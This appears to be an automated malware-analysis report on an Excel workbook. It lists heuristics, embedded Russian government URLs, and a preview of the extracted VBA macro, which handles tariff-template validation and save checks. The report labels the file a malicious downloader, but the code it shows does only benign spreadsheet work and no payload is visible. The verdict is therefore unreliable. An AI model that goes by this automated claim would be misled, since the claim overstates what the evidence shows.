MALICIOUS
144
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The file is an Excel document containing a Workbook_Open VBA macro, which is a common technique for executing malicious code upon opening. The macro utilizes CreateObject and p-code auto-execution, indicating it's designed to run arbitrary commands. While the specific payload is not directly visible, the presence of obfuscated VBA code and the Workbook_Open event strongly suggests it acts as a downloader for a second-stage payload. The document body contains what appears to be data related to Russian regional organizations and services, possibly as a lure.
Heuristics 6
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Workbook_Open macro high OLE_VBA_WBOPENWorkbook_Open macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://eias.ru/?page=show_distrs In document text (OLE body)
- https://tariff.eias.ru/procwsxls/In document text (OLE body)
- http://www.fstrf.ru/regions/region/sRIn document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
- http://sakha.gov.ru/node/6471In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 855332 bytes |
SHA-256: bff8c732a1b22222b151714979cfd3ca875dd7a220635373ea24e4ba1006b567 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 1 eval/decoder/string-building token(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ЭтаКнига"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit
Dim SErr As Boolean
Private Const SAVE_STATUS_CRITICAL_IMPACT_WARNING As String = "Шаблон будет сохранен, но НЕ БУДЕТ принят к рассмотрению из-за невыполнения ОБЯЗАТЕЛЬНЫХ условий! См. лист 'Проверка'!"
Private Const SAVE_STATUS_SUCCESS As String = "Шаблон готов к сохранению без замечаний"
Private Const SAVE_STATUS_LOW_IMPACT_WARNING As String = "Шаблон будет принят к рассмотрению, но обратите внимание НЕВЫПОЛНЕНИЕ ПРЕДУПРЕДИТЕЛЬНЫХ условий на листе 'Проверка'"
Private Const SAVE_MESSAGE_TITLE As String = "Результат проверки"
Private Sub Workbook_BeforeSave(ByVal SaveAsUI As Boolean, Cancel As Boolean)
Application.Calculate
Dim wsSheet As Worksheet
Set wb = Application.ThisWorkbook
Set wsSheet = wb.ActiveSheet
If Len(CStr(Me.Names("region_name").RefersToRange.Value)) > 0 Then
modPROV.WarningsBeforeSaving Me
If modPROV.gintCriticalImpactWarningsCounter > 0 Then
Me.CustomDocumentProperties("Status") = 1 'ТРАНС
MsgBox SAVE_STATUS_CRITICAL_IMPACT_WARNING, vbCritical + vbOKOnly, SAVE_MESSAGE_TITLE
Me.Worksheets("Проверка").Activate
ElseIf modPROV.gintLowImpactWarningsCounter > 0 Then
Me.CustomDocumentProperties("Status") = 1 'ТРАНС
MsgBox SAVE_STATUS_LOW_IMPACT_WARNING, vbExclamation + vbOKOnly, SAVE_MESSAGE_TITLE
Me.Worksheets("Проверка").Activate
Else 'ТРАНС
Me.CustomDocumentProperties("Status") = 2 'ТРАНС
MsgBox SAVE_STATUS_SUCCESS, vbInformation, SAVE_MESSAGE_TITLE
wsSheet.Activate
End If
End If
On Error GoTo ErrHandler
Dim status As Integer
status = wb.CustomDocumentProperties("Status")
If status > 2 Then
MsgBox "Документ подписан ЭЦП и не может быть изменен", vbExclamation + vbOKOnly, ThisWorkbook.name
Cancel = True
GoTo cleanUp
End If
GoTo cleanUp
ErrHandler:
MsgBox "При сохранении шаблона произошла ошибка: '" & Err.Description & "'!", _
vbOKOnly + vbCritical, _
STR_MSGBOX_WARNING_TITLE
GoTo cleanUp
cleanUp:
End Sub
Private Sub Workbook_Open()
On Error GoTo ErrHandler
Application.Calculation = xlCalculationAutomatic ' чтобы пересчет формул осуществлялся автоматически
Application.ReferenceStyle = xlA1 ' стиль ссылок - A1
ThisWorkbook.CustomDocumentProperties("Status") = 1 'ТРАНС
Dim wsSheet As Worksheet
Dim wsActiveSheet As Worksheet
Dim wsTitleSheet As Worksheet
Dim wbBook As Workbook
Set wbBook = Application.ThisWorkbook
Set wsActiveSheet = wbBook.ActiveSheet
' Проверить необходимые для работы диапазоны
If modServiceModule.IsNameExists(wbBook, "region_name") = False Or _
modServiceModule.IsNameExists(wbBook, "strPublication") = False Or _
modServiceModule.IsNameExists(wbBook, "flag_two_part_tariff") = False Or _
modServiceModule.IsNameExists(wbBook, "flag_cross_subsidization") = False Then
MsgBox "Повреждены рабочие диапазоны на листе '" & gstrMainSheetName & "': '" & Err.Description & "'!", _
vbOKOnly + vbCritical, _
STR_MSGBOX_WARNING_TITLE
GoTo cleanUp
End If
If Len(CStr(wbBook.Names("region_name").RefersToRange.cells(1, 1).Value)) = 0 Then
For Each wsSheet In wbBook.Worksheets
If wsSheet.Visible = True Then
If wsSheet.Tab.ColorIndex = colorPaleBlue Then
wsSheet.Visible = xlSheetVeryHidden
End If
End If
Next wsSheet
Else
Set wsTitleSheet = wbBook.Names("region_name").RefersToRange.parent
wsTitleSheet.Activate
wsTitleSheet.Range(
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.